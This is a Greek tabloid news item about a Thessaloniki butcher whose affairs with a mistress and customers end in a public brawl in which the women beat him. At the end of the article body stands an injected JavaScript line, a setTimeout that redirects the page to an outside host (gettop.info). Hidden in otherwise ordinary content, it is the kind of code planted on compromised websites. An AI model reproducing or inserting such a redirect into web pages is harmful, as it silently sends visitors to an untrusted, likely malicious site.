«Άναψαν φωτιές» οι ερωτικές περιπέτειες του χασάπη

0
55

 

Χαμός προκλήθηκε σε γειτονιά της Θεσσαλονίκης όταν ξέσπασε ροζ… σκάνδαλο στο οποίο ενεπλέκετο ο χασάπης.

Ο 55χρονος άνδρας, όπως αποκαλύφθηκε, εκτός από σύζυγο είχε και μόνιμη ερωμένη. Ωστόσο, δεν περιορίστηκε στις δύο γυναίκες αλλά συνήθιζε να έχει και περιστασιακές σχέσεις με πελάτισσές τους τις οποίες κέρναγε κρέας με αντάλλαγμα κάποιες ερωτικές στιγμές!

Πριν από λίγες ημέρες ο κρεοπώλης παοφάσισε να κλείσει λίγο νωρίτερα το μαγαζί ώστε να… τα πει διαιτέρως με πελάτισσα στην πίσω πόθήκη του κρεοπωλείου. Όμως, η ερωμένη του που δεν είχε νέα του ανησύχησε και πέρασε από το μαγαζί. Όταν αντίκρισε την πόρτα κλειστή αντιλήφθηκε τι συμβαίνει κι άρχισε να στέλνει απειλητικά μηνύματα στο κινητό του. Εκείνος για να μην δώσει στόχο στη γειτονιά, της άνοιξε αλλά εκείνη εντόπισε την άλλη γυναίκα. Οι δυο τους άρχισαν να βρίζονται και να φωνάζουν ενώ η ερωμένη άρπαξε την πελάτισσα από το μαλλι.

Στόχος της επίθεσης και των δύο γυναικών έγινε ο 55χρονος ερωτύλος κρεοπώλης τον οπίο ξυλοφόρτωσαν διά χειρός και τσαντών. Γρήγορα η είδηση διαδόθηκε από σπίτι σε σπίτι ώσπου έφθασε και αστα αυτιά της συζύγου του, όπου ανέλαβε τον δεύτερο γύρο ξυλοφορτώματος!

Το κρεοπωλείο παραμένει εδώ και δύο ημέρες κλειστό και ακόμη αγνοείται η τύχη του… ροζ κρεοπώλη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here